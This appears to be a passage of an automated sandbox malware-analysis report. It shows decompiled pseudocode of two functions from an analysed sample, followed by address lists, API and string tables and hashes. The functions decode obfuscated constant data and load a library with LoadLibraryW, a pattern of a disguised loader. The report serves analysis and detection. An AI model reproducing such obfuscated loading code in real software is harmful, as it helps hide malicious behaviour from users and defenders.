				 *((intOrPtr*)(_t358 - 0x20)) = 0x9a8265b0;
				 *((intOrPtr*)(_t358 - 0x1c)) = 0xfe2365ee;
				 *((intOrPtr*)(_t358 - 0x18)) = 0x511219c2;
				 *((intOrPtr*)(_t358 - 0x14)) = 0x7af3dec8;
				 *((intOrPtr*)(_t358 - 0x10)) = 0x3c4e52a;
				 *((intOrPtr*)(_t358 - 0xc)) = 0xc5d0799;
				 *((intOrPtr*)(_t358 - 8)) = 0x324220e1;
				 *((intOrPtr*)(_t358 - 4)) = 0xdcd4acd1;
				_t356 = L00401D00(0x412820, 0xd0, _t354);
				 *0x417c88 = LoadLibraryW(_t356);
				_t347 = HeapFree(GetProcessHeap(), 0, _t356);
				_t351 =  *0x417c88;
				_t357 = 0x1f5c6a;
				if( *0x417c88 != 0) {
					goto 0x4217ec;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00401480(_t349, _t351, _t358 - 0x558, _t354, _t357);
				} else {
					goto 0x4217d9;
					return _t347;
				}
			}

0x004095ba
0x004095c4
0x004095ce
0x004095d8
0x004095e2
0x004095ec
0x004095f6
0x00409600
0x0040960a
0x00409614
0x0040961e
0x00409628
0x00409632
0x0040963c
0x00409646
0x00409650
0x0040965a
0x00409664
0x0040966e
0x00409678
0x00409682
0x0040968c
0x00409696
0x004096a0
0x004096aa
0x004096b4
0x004096be
0x004096c8
0x004096d2
0x004096dc
0x004096e6
0x004096f0
0x004096fa
0x00409704
0x0040970e
0x00409718
0x00409722
0x0040972c
0x00409736
0x00409740
0x0040974a
0x00409754
0x0040975e
0x00409768
0x00409772
0x0040977c
0x00409786
0x00409790
0x0040979a
0x004097a4
0x004097ae
0x004097b8
0x004097c2
0x004097cc
0x004097d6
0x004097e0
0x004097ea
0x004097f4
0x004097fe
0x00409808
0x00409812
0x0040981c
0x00409826
0x00409830
0x0040983a
0x00409844
0x0040984e
0x00409858
0x00409862
0x0040986c
0x00409876
0x00409880
0x0040988a
0x00409894
0x0040989e
0x004098a8
0x004098b2
0x004098bc
0x004098c6
0x004098d0
0x004098da
0x004098e4
0x004098ee
0x004098f8
0x00409902
0x0040990c
0x00409916
0x00409920
0x0040992a
0x00409934
0x0040993e
0x00409948
0x00409952
0x0040995c
0x00409966
0x00409970
0x0040997a
0x00409984
0x0040998e
0x00409998
0x004099a2
0x004099ac
0x004099b6
0x004099c0
0x004099ca
0x004099d4
0x004099de
0x004099e8
0x004099f2
0x004099fc
0x00409a06
0x00409a10
0x00409a1a
0x00409a24
0x00409a2e
0x00409a38
0x00409a42
0x00409a4c
0x00409a56
0x00409a60
0x00409a6a
0x00409a74
0x00409a7e
0x00409a88
0x00409a92
0x00409a9c
0x00409aa6
0x00409ab0
0x00409aba
0x00409ac4
0x00409ace
0x00409ad8
0x00409ae2
0x00409aec
0x00409af6
0x00409b00
0x00409b0a
0x00409b14
0x00409b1e
0x00409b28
0x00409b32
0x00409b3c
0x00409b46
0x00409b50
0x00409b5a
0x00409b64
0x00409b6e
0x00409b78
0x00409b82
0x00409b8c
0x00409b96
0x00409ba0
0x00409baa
0x00409bb4
0x00409bbe
0x00409bc8
0x00409bd2
0x00409bdc
0x00409be6
0x00409bf0
0x00409bfa
0x00409c04
0x00409c0e
0x00409c18
0x00409c22
0x00409c2c
0x00409c36
0x00409c40
0x00409c4a
0x00409c54
0x00409c5e
0x00409c68
0x00409c72
0x00409c7c
0x00409c86
0x00409c90
0x00409c9a
0x00409ca4
0x00409cae
0x00409cb8
0x00409cc2
0x00409ccc
0x00409cd6
0x00409ce0
0x00409cea
0x00409cf4
0x00409cfe
0x00409d08
0x00409d12
0x00409d1c
0x00409d26
0x00409d30
0x00409d3a
0x00409d44
0x00409d4e
0x00409d58
0x00409d62
0x00409d6c
0x00409d76
0x00409d80
0x00409d8a
0x00409d94
0x00409d9e
0x00409da8
0x00409db2
0x00409dbc
0x00409dc6
0x00409dd0
0x00409dda
0x00409de4
0x00409dee
0x00409df8
0x00409e02
0x00409e0c
0x00409e16
0x00409e20
0x00409e2a
0x00409e34
0x00409e3e
0x00409e48
0x00409e52
0x00409e5c
0x00409e66
0x00409e70
0x00409e7a
0x00409e84
0x00409e8e
0x00409e98
0x00409ea2
0x00409eac
0x00409eb6
0x00409ec0
0x00409eca
0x00409ed4
0x00409ede
0x00409ee8
0x00409ef2
0x00409efc
0x00409f06
0x00409f10
0x00409f1a
0x00409f24
0x00409f2e
0x00409f38
0x00409f42
0x00409f4c
0x00409f56
0x00409f60
0x00409f6a
0x00409f74
0x00409f7e
0x00409f88
0x00409f92
0x00409f9c
0x00409fa6
0x00409fb0
0x00409fba
0x00409fc4
0x00409fce
0x00409fd8
0x00409fe2
0x00409fec
0x00409ff6
0x0040a000
0x0040a00a
0x0040a014
0x0040a01e
0x0040a028
0x0040a032
0x0040a03c
0x0040a046
0x0040a050
0x0040a05a
0x0040a064
0x0040a06e
0x0040a078
0x0040a082
0x0040a08c
0x0040a096
0x0040a0a0
0x0040a0aa
0x0040a0b4
0x0040a0be
0x0040a0c8
0x0040a0d2
0x0040a0dc
0x0040a0e6
0x0040a0f0
0x0040a0fa
0x0040a104
0x0040a10e
0x0040a118
0x0040a122
0x0040a12c
0x0040a136
0x0040a140
0x0040a14a
0x0040a154
0x0040a15e
0x0040a168
0x0040a172
0x0040a17c
0x0040a186
0x0040a190
0x0040a19a
0x0040a1a4
0x0040a1ae
0x0040a1b8
0x0040a1c2
0x0040a1cc
0x0040a1d6
0x0040a1dd
0x0040a1e4
0x0040a1eb
0x0040a1f2
0x0040a1f9
0x0040a200
0x0040a207
0x0040a20e
0x0040a215
0x0040a21c
0x0040a223
0x0040a22a
0x0040a23b
0x0040a247
0x0040a24e
0x0040a255
0x0040a25c
0x0040a263
0x0040a26a
0x0040a271
0x0040a278
0x0040a27f
0x0040a286
0x0040a28d
0x0040a294
0x0040a29b
0x0040a2a2
0x0040a2a9
0x0040a2b0
0x0040a2b7
0x0040a2be
0x0040a2cd
0x0040a2d9
0x0040a2e5
0x0040a2eb
0x0040a2f1
0x0040a2f4
0x0040a2fc
0x0040a301
0x0040a302
0x0040a303
0x0040a304
0x0040a305
0x0040a306
0x0040a307
0x0040a308
0x0040a309
0x0040a30a
0x0040a31c
0x0040a2f6
0x0040a2f6
0x0040a2fb
0x0040a2fb

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0040A2D0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A2DE
HeapFree.KERNEL32(00000000), ref: 0040A2E5

Strings

*, xrefs: 00409CFE
>ZX\, xrefs: 0040966E
t_`n, xrefs: 0040A20E
(A, xrefs: 0040A242
xf-u, xrefs: 0040A032
~@, xrefs: 0040968C
Lm, xrefs: 004096D2
\R, xrefs: 00409EFC
$'i, xrefs: 00409BF0
)VB:, xrefs: 0040A0F0
t!i, xrefs: 00409876
B2, xrefs: 0040A2B7

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: (A$$'i$)VB:$*$>ZX\$Lm$t!i$t_`n$xf-u$~@$ B2$\R
API String ID: 872250060-25653790
Opcode ID: b7475d5a2ffd851a0580c8dfcbcff101174796be8e5b82729d004887340c32b5
Instruction ID: 5b3a4c70b68a8d06b81dfe3be5849898cb5d9a87fb0cc2b39e7c4d9c2e3be479
Opcode Fuzzy Hash: b7475d5a2ffd851a0580c8dfcbcff101174796be8e5b82729d004887340c32b5
Instruction Fuzzy Hash: EC52A6F48563698FDBA19F429A886CDBB74BB11744F6082C8C25D3B215CB744BC6CF89

Uniqueness

Uniqueness Score: 100.00%

Function 00408B2A, Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 288
memorylibraryUNIQUE

C-Code - Quality: 95%

			E00408B2A(void* __esi, void* __eflags) {
				int _t273;
				void* _t275;
				void* _t280;
				void* _t282;
				void* _t283;
				void* _t284;

				 *((intOrPtr*)(_t284 - 0x430)) = 0xaf709e67;
				 *((intOrPtr*)(_t284 - 0x42c)) = 0x1163a71d;
				 *((intOrPtr*)(_t284 - 0x428)) = 0x4e215be2;
				 *((intOrPtr*)(_t284 - 0x424)) = 0x19bceaf9;
				 *((intOrPtr*)(_t284 - 0x420)) = 0xa91d265;
				 *((intOrPtr*)(_t284 - 0x41c)) = 0xf82a1363;
				 *((intOrPtr*)(_t284 - 0x418)) = 0x6e808938;
				 *((intOrPtr*)(_t284 - 0x414)) = 0x98c7da5c;
				 *((intOrPtr*)(_t284 - 0x410)) = 0xc8adebec;
				 *((intOrPtr*)(_t284 - 0x40c)) = 0x77677182;
				 *((intOrPtr*)(_t284 - 0x408)) = 0xc11d7675;
				 *((intOrPtr*)(_t284 - 0x404)) = 0xa0508401;
				 *((intOrPtr*)(_t284 - 0x400)) = 0x876a05d6;
				 *((intOrPtr*)(_t284 - 0x3fc)) = 0x9081f2c7;
				 *((intOrPtr*)(_t284 - 0x3f8)) = 0xc48e2074;
				 *((intOrPtr*)(_t284 - 0x3f4)) = 0x7807f188;
				 *((intOrPtr*)(_t284 - 0x3f0)) = 0x4fcdd0e;
				 *((intOrPtr*)(_t284 - 0x3ec)) = 0x881b8662;
				 *((intOrPtr*)(_t284 - 0x3e8)) = 0x1a3292c8;
				 *((intOrPtr*)(_t284 - 0x3e4)) = 0x1b6da59f;
				 *((intOrPtr*)(_t284 - 0x3e0)) = 0x6b28c3db;
				 *((intOrPtr*)(_t284 - 0x3dc)) = 0xda448878;
				 *((intOrPtr*)(_t284 - 0x3d8)) = 0x5a5cda93;
				 *((intOrPtr*)(_t284 - 0x3d4)) = 0x357254a9;
				 *((intOrPtr*)(_t284 - 0x3d0)) = 0xf5d47e7f;
				 *((intOrPtr*)(_t284 - 0x3cc)) = 0x73f8b64e;
				 *((intOrPtr*)(_t284 - 0x3c8)) = 0xb2e97c98;
				 *((intOrPtr*)(_t284 - 0x3c4)) = 0x3a85e2c1;
				 *((intOrPtr*)(_t284 - 0x3c0)) = 0x3178e38c;
				 *((intOrPtr*)(_t284 - 0x3bc)) = 0x3cef46f6;
				 *((intOrPtr*)(_t284 - 0x3b8)) = 0x10bc6fd5;
				 *((intOrPtr*)(_t284 - 0x3b4)) = 0x7141317;
				 *((intOrPtr*)(_t284 - 0x3b0)) = 0x1cb45dfe;
				 *((intOrPtr*)(_t284 - 0x3ac)) = 0x84231081;
				 *((intOrPtr*)(_t284 - 0x3a8)) = 0x30e76b09;
				 *((intOrPtr*)(_t284 - 0x3a4)) = 0x4d4fc90a;
				 *((intOrPtr*)(_t284 - 0x3a0)) = 0xca1ab3fd;
				 *((intOrPtr*)(_t284 - 0x39c)) = 0xede0e45a;
				 *((intOrPtr*)(_t284 - 0x398)) = 0x6be617d1;
				 *((intOrPtr*)(_t284 - 0x394)) = 0x97395634;
				 *((intOrPtr*)(_t284 - 0x390)) = 0xdc008303;
				 *((intOrPtr*)(_t284 - 0x38c)) = 0x1bbe291a;
				 *((intOrPtr*)(_t284 - 0x388)) = 0x1fa131f2;
				 *((intOrPtr*)(_t284 - 0x384)) = 0x65258f83;
				 *((intOrPtr*)(_t284 - 0x380)) = 0xbbfc5afb;
				 *((intOrPtr*)(_t284 - 0x37c)) = 0x4f70604d;
				 *((intOrPtr*)(_t284 - 0x378)) = 0x7edeb9fa;
				 *((intOrPtr*)(_t284 - 0x374)) = 0x97c728ef;
				 *((intOrPtr*)(_t284 - 0x370)) = 0x38cb8d38;
				 *((intOrPtr*)(_t284 - 0x36c)) = 0x286c3af9;
				 *((intOrPtr*)(_t284 - 0x368)) = 0xb3aff7af;
				 *((intOrPtr*)(_t284 - 0x364)) = 0x17cf560a;
				 *((intOrPtr*)(_t284 - 0x360)) = 0xcdcd756e;
				 *((intOrPtr*)(_t284 - 0x35c)) = 0x1ac03899;
				 *((intOrPtr*)(_t284 - 0x358)) = 0xd1ed7e7;
				 *((intOrPtr*)(_t284 - 0x354)) = 0x6a58d108;
				 *((intOrPtr*)(_t284 - 0x350)) = 0x70baf019;
				 *((intOrPtr*)(_t284 - 0x34c)) = 0x1f190eb1;
				 *((intOrPtr*)(_t284 - 0x348)) = 0x7d6ac9a2;
				 *((intOrPtr*)(_t284 - 0x344)) = 0x6eb46f28;
				 *((intOrPtr*)(_t284 - 0x340)) = 0xea7053fc;
				 *((intOrPtr*)(_t284 - 0x33c)) = 0x16086f74;
				 *((intOrPtr*)(_t284 - 0x338)) = 0xb36bf086;
				 *((intOrPtr*)(_t284 - 0x334)) = 0x9919b3ce;
				 *((intOrPtr*)(_t284 - 0x330)) = 0x73c7d9e8;
				 *((intOrPtr*)(_t284 - 0x32c)) = 0xb9e9eac7;
				 *((intOrPtr*)(_t284 - 0x328)) = 0x7a2806a8;
				 *((intOrPtr*)(_t284 - 0x324)) = 0x5ff66e76;
				 *((intOrPtr*)(_t284 - 0x320)) = 0xb4aeb549;
				 *((intOrPtr*)(_t284 - 0x31c)) = 0xc7b18370;
				 *((intOrPtr*)(_t284 - 0x318)) = 0x51c87220;
				 *((intOrPtr*)(_t284 - 0x314)) = 0xa2573e1;
				 *((intOrPtr*)(_t284 - 0x310)) = 0x5244303c;
				 *((intOrPtr*)(_t284 - 0x30c)) = 0x6ac6cac3;
				 *((intOrPtr*)(_t284 - 0x308)) = 0xbb2d84a9;
				 *((intOrPtr*)(_t284 - 0x304)) = 0x5275873c;
				 *((intOrPtr*)(_t284 - 0x300)) = 0xa6de334d;
				 *((intOrPtr*)(_t284 - 0x2fc)) = 0xf528764d;
				 *((intOrPtr*)(_t284 - 0x2f8)) = 0x53a5b803;
				 *((intOrPtr*)(_t284 - 0x2f4)) = 0xe7d9fd2e;
				 *((intOrPtr*)(_t284 - 0x2f0)) = 0xd1cf7bc1;
				 *((intOrPtr*)(_t284 - 0x2ec)) = 0x716bc8ea;
				 *((intOrPtr*)(_t284 - 0x2e8)) = 0xa86e2fa5;
				 *((intOrPtr*)(_t284 - 0x2e4)) = 0xb485810b;
				 *((intOrPtr*)(_t284 - 0x2e0)) = 0x14fa3a6;
				 *((intOrPtr*)(_t284 - 0x2dc)) = 0x703ab5a7;
				 *((intOrPtr*)(_t284 - 0x2d8)) = 0x836b3e3f;
				 *((intOrPtr*)(_t284 - 0x2d4)) = 0xde047161;
				 *((intOrPtr*)(_t284 - 0x2d0)) = 0xad4662ab;
				 *((intOrPtr*)(_t284 - 0x2cc)) = 0x146f4fdf;
				 *((intOrPtr*)(_t284 - 0x2c8)) = 0xcacf051e;
				 *((intOrPtr*)(_t284 - 0x2c4)) = 0x4c4ec529;
				 *((intOrPtr*)(_t284 - 0x2c0)) = 0x65d4fb8;
				 *((intOrPtr*)(_t284 - 0x2bc)) = 0x585efb5d;
				 *((intOrPtr*)(_t284 - 0x2b8)) = 0x8814d895;
				 *((intOrPtr*)(_t284 - 0x2b4)) = 0xdb36feaa;
				 *((intOrPtr*)(_t284 - 0x2b0)) = 0x42a7509b;
				 *((intOrPtr*)(_t284 - 0x2ac)) = 0x50f2cfee;
				 *((intOrPtr*)(_t284 - 0x2a8)) = 0x7949fb0e;
				 *((intOrPtr*)(_t284 - 0x2a4)) = 0x3c4576fa;
				 *((intOrPtr*)(_t284 - 0x2a0)) = 0x104dc731;
				 *((intOrPtr*)(_t284 - 0x29c)) = 0x4f579a08;
				 *((intOrPtr*)(_t284 - 0x298)) = 0x49ef92cf;
				 *((intOrPtr*)(_t284 - 0x294)) = 0x591d935f;
				 *((intOrPtr*)(_t284 - 0x290)) = 0x4b44cf8;
				 *((intOrPtr*)(_t284 - 0x28c)) = 0x87631a53;
				 *((intOrPtr*)(_t284 - 0x288)) = 0x28518c37;
				 *((intOrPtr*)(_t284 - 0x284)) = 0xe1b72a74;
				 *((intOrPtr*)(_t284 - 0x280)) = 0xd1cb6f5c;
				 *((intOrPtr*)(_t284 - 0x27c)) = 0xf48436d8;
				 *((intOrPtr*)(_t284 - 0x278)) = 0x81307b06;
				 *((intOrPtr*)(_t284 - 0x274)) = 0xe03d9e96;
				 *((intOrPtr*)(_t284 - 0x270)) = 0x5b40c1bf;
				 *((intOrPtr*)(_t284 - 0x26c)) = 0x683da5f7;
				 *((intOrPtr*)(_t284 - 0x268)) = 0xc5dacac8;
				 *((intOrPtr*)(_t284 - 0x264)) = 0xe7e5f0f1;
				 *((intOrPtr*)(_t284 - 0x260)) = 0xb332d9fa;
				 *((intOrPtr*)(_t284 - 0x25c)) = 0x6870953f;
				 *((intOrPtr*)(_t284 - 0x258)) = 0x783f7efa;
				 *((intOrPtr*)(_t284 - 0x254)) = 0xae4fa740;
				 *((intOrPtr*)(_t284 - 0x250)) = 0x7f79a4ac;
				 *((intOrPtr*)(_t284 - 0x24c)) = 0xdc5b77cf;
				 *((intOrPtr*)(_t284 - 0x248)) = 0x25da523d;
				 *((intOrPtr*)(_t284 - 0x244)) = 0xe0d312fe;
				 *((intOrPtr*)(_t284 - 0x240)) = 0xd2dff747;
				 *((intOrPtr*)(_t284 - 0x23c)) = 0x7022095;
				 *((intOrPtr*)(_t284 - 0x238)) = 0x719a7b0b;
				 *((intOrPtr*)(_t284 - 0x234)) = 0x7970fd46;
				 *((intOrPtr*)(_t284 - 0x230)) = 0x15b2d04a;
				 *((intOrPtr*)(_t284 - 0x22c)) = 0xcc3b50c3;
				 *((intOrPtr*)(_t284 - 0x228)) = 0x5d96658a;
				 *((intOrPtr*)(_t284 - 0x224)) = 0x5091a0a8;
				 *((intOrPtr*)(_t284 - 0x220)) = 0xab518f9;
				 *((intOrPtr*)(_t284 - 0x21c)) = 0x4f751827;
				 *((intOrPtr*)(_t284 - 0x218)) = 0x947dd9aa;
				 *((intOrPtr*)(_t284 - 0x214)) = 0xbfbbb83e;
				 *((intOrPtr*)(_t284 - 0x210)) = 0x3b76d3f;
				 *((intOrPtr*)(_t284 - 0x20c)) = 0xf9878d9d;
				 *((intOrPtr*)(_t284 - 0x208)) = 0xf8ea9dae;
				 *((intOrPtr*)(_t284 - 0x204)) = 0x6133bef0;
				 *((intOrPtr*)(_t284 - 0x200)) = 0x76e6f97b;
				 *((intOrPtr*)(_t284 - 0x1fc)) = 0x5e025c72;
				 *((intOrPtr*)(_t284 - 0x1f8)) = 0x4752fe5;
				 *((intOrPtr*)(_t284 - 0x1f4)) = 0xfdcd733f;
				 *((intOrPtr*)(_t284 - 0x1f0)) = 0xcbbf6b7e;
				 *((intOrPtr*)(_t284 - 0x1ec)) = 0xf32a2264;
				 *((intOrPtr*)(_t284 - 0x1e8)) = 0xbec1ac14;
				 *((intOrPtr*)(_t284 - 0x1e4)) = 0x9f1483c4;
				 *((intOrPtr*)(_t284 - 0x1e0)) = 0x92065933;
				 *((intOrPtr*)(_t284 - 0x1dc)) = 0x51ff9fa1;
				 *((intOrPtr*)(_t284 - 0x1d8)) = 0x625a13b4;
				 *((intOrPtr*)(_t284 - 0x1d4)) = 0x2ded854;
				 *((intOrPtr*)(_t284 - 0x1d0)) = 0xb6117717;
				 *((intOrPtr*)(_t284 - 0x1cc)) = 0x91e781f9;
				 *((intOrPtr*)(_t284 - 0x1c8)) = 0xcd6f92f7;
				 *((intOrPtr*)(_t284 - 0x1c4)) = 0x87a2363d;
				 *((intOrPtr*)(_t284 - 0x1c0)) = 0x13b8268e;
				 *((intOrPtr*)(_t284 - 0x1bc)) = 0x2580013;
				 *((intOrPtr*)(_t284 - 0x1b8)) = 0x5ecdb453;
				 *((intOrPtr*)(_t284 - 0x1b4)) = 0x34b5737;
				 *((intOrPtr*)(_t284 - 0x1b0)) = 0xab27928e;
				 *((intOrPtr*)(_t284 - 0x1ac)) = 0x332b8ed3;
				 *((intOrPtr*)(_t284 - 0x1a8)) = 0x7f922841;
				 *((intOrPtr*)(_t284 - 0x1a4)) = 0x7e650469;
				 *((intOrPtr*)(_t284 - 0x1a0)) = 0xd5cf8ddc;
				 *((intOrPtr*)(_t284 - 0x19c)) = 0xf2a7d7c;
				 *((intOrPtr*)(_t284 - 0x198)) = 0x139aa2bd;
				 *((intOrPtr*)(_t284 - 0x194)) = 0x180a5291;
				 *((intOrPtr*)(_t284 - 0x190)) = 0xab8c0cb8;
				 *((intOrPtr*)(_t284 - 0x18c)) = 0xea542bff;
				 *((intOrPtr*)(_t284 - 0x188)) = 0xc0c12a40;
				 *((intOrPtr*)(_t284 - 0x184)) = 0xb850ac98;
				 *((intOrPtr*)(_t284 - 0x180)) = 0x1bf805ad;
				 *((intOrPtr*)(_t284 - 0x17c)) = 0x7907e523;
				 *((intOrPtr*)(_t284 - 0x178)) = 0xe8c03c27;
				 *((intOrPtr*)(_t284 - 0x174)) = 0x85cd6441;
				 *((intOrPtr*)(_t284 - 0x170)) = 0xc7d5e05c;
				 *((intOrPtr*)(_t284 - 0x16c)) = 0xc3189a81;
				 *((intOrPtr*)(_t284 - 0x168)) = 0x479f2e5f;
				 *((intOrPtr*)(_t284 - 0x164)) = 0x6c3275b5;
				 *((intOrPtr*)(_t284 - 0x160)) = 0x965b94c0;
				 *((intOrPtr*)(_t284 - 0x15c)) = 0x79db8e5e;
				 *((intOrPtr*)(_t284 - 0x158)) = 0x9963eb1a;
				 *((intOrPtr*)(_t284 - 0x154)) = 0x566b7606;
				 *((intOrPtr*)(_t284 - 0x150)) = 0x34268710;
				 *((intOrPtr*)(_t284 - 0x14c)) = 0xb16c33fb;
				 *((intOrPtr*)(_t284 - 0x148)) = 0xa9e70d08;
				 *((intOrPtr*)(_t284 - 0x144)) = 0xa4f0ba81;
				 *((intOrPtr*)(_t284 - 0x140)) = 0x5dbef4f;
				 *((intOrPtr*)(_t284 - 0x13c)) = 0x186f7a9e;
				 *((intOrPtr*)(_t284 - 0x138)) = 0x6189fd9a;
				 *((intOrPtr*)(_t284 - 0x134)) = 0x88407b08;
				 *((intOrPtr*)(_t284 - 0x130)) = 0x3153193f;
				 *((intOrPtr*)(_t284 - 0x12c)) = 0x67230cd3;
				 *((intOrPtr*)(_t284 - 0x128)) = 0x5fd0a1fe;
				 *((intOrPtr*)(_t284 - 0x124)) = 0x356453bb;
				 *((intOrPtr*)(_t284 - 0x120)) = 0x7c6cf28b;
				 *((intOrPtr*)(_t284 - 0x11c)) = 0xca12322b;
				 *((intOrPtr*)(_t284 - 0x118)) = 0x3ffcc3c2;
				 *((intOrPtr*)(_t284 - 0x114)) = 0x442ea63e;
				 *((intOrPtr*)(_t284 - 0x110)) = 0xef0f8a02;
				 *((intOrPtr*)(_t284 - 0x10c)) = 0xa1aadcfb;
				 *((intOrPtr*)(_t284 - 0x108)) = 0x97db4dc8;
				 *((intOrPtr*)(_t284 - 0x104)) = 0xb5745228;
				 *((intOrPtr*)(_t284 - 0x100)) = 0x92edbdaf;
				 *((intOrPtr*)(_t284 - 0xfc)) = 0x3d612b8;
				 *((intOrPtr*)(_t284 - 0xf8)) = 0x2acb5d86;
				 *((intOrPtr*)(_t284 - 0xf4)) = 0xb378ebbf;
				 *((intOrPtr*)(_t284 - 0xf0)) = 0x888f56a5;
				 *((intOrPtr*)(_t284 - 0xec)) = 0xb44281f4;
				 *((intOrPtr*)(_t284 - 0xe8)) = 0x1e5aefa2;
				 *((intOrPtr*)(_t284 - 0xe4)) = 0xe64825e9;
				 *((intOrPtr*)(_t284 - 0xe0)) = 0x8648df89;
				 *((intOrPtr*)(_t284 - 0xdc)) = 0x115ea883;
				 *((intOrPtr*)(_t284 - 0xd8)) = 0x3af74aa7;
				 *((intOrPtr*)(_t284 - 0xd4)) = 0x202a9a87;
				 *((intOrPtr*)(_t284 - 0xd0)) = 0xbf893e19;
				 *((intOrPtr*)(_t284 - 0xcc)) = 0x69d7038c;
				 *((intOrPtr*)(_t284 - 0xc8)) = 0x7c71740b;
				 *((intOrPtr*)(_t284 - 0xc4)) = 0xc7ccad21;
				 *((intOrPtr*)(_t284 - 0xc0)) = 0xee01f4da;
				 *((intOrPtr*)(_t284 - 0xbc)) = 0x68406b5e;
				 *((intOrPtr*)(_t284 - 0xb8)) = 0x93566171;
				 *((intOrPtr*)(_t284 - 0xb4)) = 0xbc3b2234;
				 *((intOrPtr*)(_t284 - 0xb0)) = 0x6f738a8f;
				 *((intOrPtr*)(_t284 - 0xac)) = 0x924d71cd;
				 *((intOrPtr*)(_t284 - 0xa8)) = 0xccae1042;
				 *((intOrPtr*)(_t284 - 0xa4)) = 0x6b902c01;
				 *((intOrPtr*)(_t284 - 0xa0)) = 0xdaaf197b;
				 *((intOrPtr*)(_t284 - 0x9c)) = 0x5e5aebef;
				 *((intOrPtr*)(_t284 - 0x98)) = 0x8fb5e58c;
				 *((intOrPtr*)(_t284 - 0x94)) = 0xf5fe6f7e;
				 *((intOrPtr*)(_t284 - 0x90)) = 0xc7957f25;
				 *((intOrPtr*)(_t284 - 0x8c)) = 0x7c49cf4e;
				 *((intOrPtr*)(_t284 - 0x88)) = 0x6a7edd29;
				 *((intOrPtr*)(_t284 - 0x84)) = 0x30389426;
				 *((intOrPtr*)(_t284 - 0x80)) = 0xb39b1eb;
				 *((intOrPtr*)(_t284 - 0x7c)) = 0x32da1600;
				 *((intOrPtr*)(_t284 - 0x78)) = 0xdc7fb1ae;
				 *((intOrPtr*)(_t284 - 0x74)) = 0x2337eb3c;
				 *((intOrPtr*)(_t284 - 0x70)) = 0xafd2921b;
				 *((intOrPtr*)(_t284 - 0x6c)) = 0x51dd5891;
				 *((intOrPtr*)(_t284 - 0x68)) = 0xacc11b49;
				 *((intOrPtr*)(_t284 - 0x64)) = 0x23a45974;
				 *((intOrPtr*)(_t284 - 0x60)) = 0x832c3c3f;
				 *((intOrPtr*)(_t284 - 0x5c)) = 0x562f46e;
				 *((intOrPtr*)(_t284 - 0x58)) = 0xba5bcd86;
				 *((intOrPtr*)(_t284 - 0x54)) = 0x7359cfcf;
				 *((intOrPtr*)(_t284 - 0x50)) = 0xcabec7c;
				 *((intOrPtr*)(_t284 - 0x4c)) = 0x9697f9c0;
				 *((intOrPtr*)(_t284 - 0x48)) = 0x35db867b;
				 *((intOrPtr*)(_t284 - 0x44)) = 0xa97d7963;
				 *((intOrPtr*)(_t284 - 0x40)) = 0x147bfba5;
				 *((intOrPtr*)(_t284 - 0x3c)) = 0x2596c387;
				 *((intOrPtr*)(_t284 - 0x38)) = 0x7ee5d084;
				 *((intOrPtr*)(_t284 - 0x34)) = 0x8c122eb4;
				 *((intOrPtr*)(_t284 - 0x30)) = 0x5766d9df;
				 *((intOrPtr*)(_t284 - 0x2c)) = 0x4d281f85;
				 *((intOrPtr*)(_t284 - 0x28)) = 0x2062f8bf;
				 *((intOrPtr*)(_t284 - 0x24)) = 0xfb193eb3;
				 *((intOrPtr*)(_t284 - 0x20)) = 0x64e2007f;
				 *((intOrPtr*)(_t284 - 0x1c)) = 0x377c16ec;
				 *((intOrPtr*)(_t284 - 0x18)) = 0x98aeaae7;
				 *((intOrPtr*)(_t284 - 0x14)) = 0xcfe1fba1;
				 *((intOrPtr*)(_t284 - 0x10)) = 0xd5013e25;
				 *((intOrPtr*)(_t284 - 0xc)) = 0x145b8804;
				 *((intOrPtr*)(_t284 - 8)) = 0xdc6b19a2;
				 *((intOrPtr*)(_t284 - 4)) = 0xd0c5ad00;
				_t282 = L00401D00(0x4131f0, 0x1a0, _t280);
				 *0x417c84 = LoadLibraryW(_t282);
				_t273 = HeapFree(GetProcessHeap(), 0, _t282);
				_t277 =  *0x417c84;
				_t283 = 0x1f5c6a;
				if( *0x417c84 != 0) {
					goto 0x4217a4;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00401480(_t275, _t277, _t284 - 0x430, _t280, _t283);
				} else {
					goto 0x421791;
					return _t273;
				}
			}

0x00408b2a
0x00408b34
0x00408b3e
0x00408b48
0x00408b52
0x00408b5c
0x00408b66
0x00408b70
0x00408b7a
0x00408b84
0x00408b8e
0x00408b98
0x00408ba2
0x00408bac
0x00408bb6
0x00408bc0
0x00408bca
0x00408bd4
0x00408bde
0x00408be8
0x00408bf2
0x00408bfc
0x00408c06
0x00408c10
0x00408c1a
0x00408c24
0x00408c2e
0x00408c38
0x00408c42
0x00408c4c
0x00408c56
0x00408c60
0x00408c6a
0x00408c74
0x00408c7e
0x00408c88
0x00408c92
0x00408c9c
0x00408ca6
0x00408cb0
0x00408cba
0x00408cc4
0x00408cce
0x00408cd8
0x00408ce2
0x00408cec
0x00408cf6
0x00408d00
0x00408d0a
0x00408d14
0x00408d1e
0x00408d28
0x00408d32
0x00408d3c
0x00408d46
0x00408d50
0x00408d5a
0x00408d64
0x00408d6e
0x00408d78
0x00408d82
0x00408d8c
0x00408d96
0x00408da0
0x00408daa
0x00408db4
0x00408dbe
0x00408dc8
0x00408dd2
0x00408ddc
0x00408de6
0x00408df0
0x00408dfa
0x00408e04
0x00408e0e
0x00408e18
0x00408e22
0x00408e2c
0x00408e36
0x00408e40
0x00408e4a
0x00408e54
0x00408e5e
0x00408e68
0x00408e72
0x00408e7c
0x00408e86
0x00408e90
0x00408e9a
0x00408ea4
0x00408eae
0x00408eb8
0x00408ec2
0x00408ecc
0x00408ed6
0x00408ee0
0x00408eea
0x00408ef4
0x00408efe
0x00408f08
0x00408f12
0x00408f1c
0x00408f26
0x00408f30
0x00408f3a
0x00408f44
0x00408f4e
0x00408f58
